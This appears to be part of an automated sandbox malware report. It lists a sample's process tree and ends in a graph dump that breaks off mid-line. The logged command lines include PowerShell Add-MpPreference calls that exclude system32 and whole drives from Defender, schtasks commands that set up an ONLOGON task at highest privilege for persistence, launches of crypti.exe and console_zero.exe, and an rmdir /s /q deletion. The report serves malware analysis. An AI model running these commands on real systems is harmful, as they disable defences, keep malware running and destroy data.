                        Imagebase:0x7ff608be0000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:53
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k DcomLaunch
                        Imagebase:0x7ff7403e0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:54
                        Start time:03:40:26
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:55
                        Start time:03:40:26
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:56
                        Start time:03:40:26
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:57
                        Start time:03:40:27
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:58
                        Start time:03:40:27
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:59
                        Start time:03:40:27
                        Start date:21/08/2024
                        Path:C:\Windows\System32\console_zero.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\console_zero.exe"
                        Imagebase:0x7ff6f8c50000
                        File size:477'696 bytes
                        MD5 hash:74CF33F8C2FCB56F749AAF411B9AE302
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 18%, ReversingLabs
                        Has exited:true

                        Target ID:60
                        Start time:03:40:27
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c schtasks /delete /tn "console_zero" /f
                        Imagebase:0x7ff7403e0000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:61
                        Start time:03:40:27
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:62
                        Start time:03:40:27
                        Start date:21/08/2024
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks /delete /tn "console_zero" /f
                        Imagebase:0x7ff67e790000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:63
                        Start time:03:40:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:64
                        Start time:03:40:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:65
                        Start time:03:40:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\timeout.exe
                        Wow64 process (32bit):false
                        Commandline:timeout /t 10 /nobreak
                        Imagebase:0x7ff6d8670000
                        File size:32'768 bytes
                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:66
                        Start time:03:40:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:67
                        Start time:03:40:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:68
                        Start time:03:40:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                        Imagebase:0x7ff67e790000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:69
                        Start time:03:40:29
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:70
                        Start time:03:40:29
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:71
                        Start time:03:40:29
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:72
                        Start time:03:40:30
                        Start date:21/08/2024
                        Path:C:\Windows\System32\console_zero.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\console_zero.exe
                        Imagebase:0x7ff6f8c50000
                        File size:477'696 bytes
                        MD5 hash:74CF33F8C2FCB56F749AAF411B9AE302
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:73
                        Start time:03:40:30
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c schtasks /delete /tn "console_zero" /f
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:74
                        Start time:03:40:30
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:75
                        Start time:03:40:30
                        Start date:21/08/2024
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks /delete /tn "console_zero" /f
                        Imagebase:0x7ff67e790000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:76
                        Start time:03:40:31
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:77
                        Start time:03:40:31
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:78
                        Start time:03:40:31
                        Start date:21/08/2024
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                        Imagebase:0x7ff67e790000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:79
                        Start time:03:40:32
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:80
                        Start time:03:40:32
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:81
                        Start time:03:40:32
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:82
                        Start time:03:40:48
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:83
                        Start time:03:40:48
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff799c70000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:84
                        Start time:03:40:48
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff6d3520000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:85
                        Start time:03:40:55
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:86
                        Start time:03:40:55
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:87
                        Start time:03:40:55
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff6ea920000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:88
                        Start time:03:41:02
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:89
                        Start time:03:41:02
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:90
                        Start time:03:41:02
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7d6230000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:91
                        Start time:03:41:08
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:92
                        Start time:03:41:08
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:93
                        Start time:03:41:08
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff63ab00000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:94
                        Start time:03:41:15
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff6b13f0000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:95
                        Start time:03:41:15
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:96
                        Start time:03:41:15
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff663a90000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:97
                        Start time:03:41:21
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:98
                        Start time:03:41:21
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:99
                        Start time:03:41:21
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff659170000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:100
                        Start time:03:41:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:101
                        Start time:03:41:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:102
                        Start time:03:41:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff618410000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:103
                        Start time:03:41:35
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:104
                        Start time:03:41:35
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:105
                        Start time:03:41:35
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff6e0c70000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:106
                        Start time:03:41:41
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:107
                        Start time:03:41:41
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:108
                        Start time:03:41:41
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7a6290000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                          Execution Graph

                          Execution Coverage:2.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:14%
                          Total number of Nodes:1065
                          Total number of Limit Nodes:13
19070->19071 19073 7ff646e6936c std::_Locinfo::_Locinfo_ctor 38 API calls 19072->19073 19074 7ff646e63116 19073->19074 19077 7ff646e62e20 19074->19077 19084 7ff646e62d84 EnterCriticalSection 19077->19084 19086 7ff646e5c798 __std_exception_copy 35 API calls 19085->19086 19087 7ff646e41273 19086->19087 19088 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19087->19088 19089 7ff646e4128d 19088->19089 19089->19070 19092 7ff646e6314c 19090->19092 19091 7ff646e63172 19093 7ff646e62d18 _set_fmode 13 API calls 19091->19093 19092->19091 19094 7ff646e631a5 19092->19094 19095 7ff646e63177 19093->19095 19097 7ff646e631ab 19094->19097 19098 7ff646e631b8 19094->19098 19096 7ff646e62408 _invalid_parameter_noinfo 35 API calls 19095->19096 19099 7ff646e5a285 19096->19099 19100 7ff646e62d18 _set_fmode 13 API calls 19097->19100 19117 7ff646e6896c 19098->19117 19099->18909 19109 7ff646e61fe8 19099->19109 19100->19099 19110 7ff646e62018 19109->19110 19336 7ff646e61ccc 19110->19336 19112 7ff646e62034 19112->18911 19114 7ff646e60d20 19113->19114 19348 7ff646e60bcc 19114->19348 19116 7ff646e60d39 19116->18909 19130 7ff646e62d84 EnterCriticalSection 19117->19130 19337 7ff646e61d36 19336->19337 19338 7ff646e61cf6 19336->19338 19337->19338 19340 7ff646e61d42 19337->19340 19339 7ff646e62350 _invalid_parameter_noinfo 35 API calls 19338->19339 19342 7ff646e61d1d 19339->19342 19347 7ff646e610b8 EnterCriticalSection 19340->19347 19342->19112 19349 7ff646e60be7 19348->19349 19350 7ff646e60c15 19348->19350 19351 7ff646e62350 _invalid_parameter_noinfo 35 API calls 19349->19351 19353 7ff646e60c07 19350->19353 19358 7ff646e610b8 EnterCriticalSection 19350->19358 19351->19353 19353->19116 19360 7ff646e61079 19359->19360 19364 7ff646e61089 19359->19364 19361 7ff646e62d18 _set_fmode 13 API calls 19360->19361 19362 7ff646e6107e 19361->19362 19363 7ff646e62408 _invalid_parameter_noinfo 35 API calls 19362->19363 19363->19364 19364->18917 19366 7ff646e4c6ac 19365->19366 19380 7ff646e4b8de 
19365->19380 19367 7ff646e5aae8 std::_Facet_Register 37 API calls 19366->19367 19366->19380 19368 7ff646e4c6bf 19367->19368 19369 7ff646e599bc std::_Lockit::_Lockit 39 API calls 19368->19369 19370 7ff646e4c6f0 19369->19370 19371 7ff646e4c72c 19370->19371 19372 7ff646e4c7e6 19370->19372 19374 7ff646e59f6c std::_Locinfo::_Locinfo_ctor 67 API calls 19371->19374 19373 7ff646e59c34 37 API calls 19372->19373 19375 7ff646e4c7f2 19373->19375 19376 7ff646e4c738 19374->19376 19381 7ff646e59fd8 19376->19381 19378 7ff646e4c753 19379 7ff646e59a34 std::_Lockit::~_Lockit LeaveCriticalSection 19378->19379 19379->19380 19380->18933 19380->18934 19382 7ff646e59fec 19381->19382 19383 7ff646e59fe5 19381->19383 19382->19378 19384 7ff646e63100 std::_Locinfo::_Locinfo_ctor 67 API calls 19383->19384 19384->19382 19386 7ff646e58250 19385->19386 19390 7ff646e5822a 19385->19390 19388 7ff646e5825e 19386->19388 19395 7ff646e49870 19386->19395 19387 7ff646e5824a 19387->18741 19388->18741 19390->19387 19391 7ff646e420e0 72 API calls 19390->19391 19392 7ff646e582b3 19391->19392 19393 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19392->19393 19394 7ff646e582c4 19393->19394 19396 7ff646e498ae 19395->19396 19405 7ff646e49930 19395->19405 19411 7ff646e49010 19396->19411 19397 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19399 7ff646e4995e 19397->19399 19399->19388 19401 7ff646e4991d 19415 7ff646e59c58 __uncaught_exceptions 19401->19415 19403 7ff646e49922 19403->19405 19419 7ff646e499d0 19403->19419 19405->19397 19406 7ff646e49973 19407 7ff646e420e0 72 API calls 19406->19407 19408 7ff646e499b5 19407->19408 19409 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19408->19409 19410 7ff646e499c6 19409->19410 19412 7ff646e49039 19411->19412 19413 7ff646e4904e 19412->19413 19414 7ff646e49870 81 API calls 19412->19414 19413->19401 19413->19406 19414->19413 19415->19403 19416 7ff646e5ca88 19415->19416 19426 7ff646e5ce30 19416->19426 19420 7ff646e49a19 19419->19420 19421 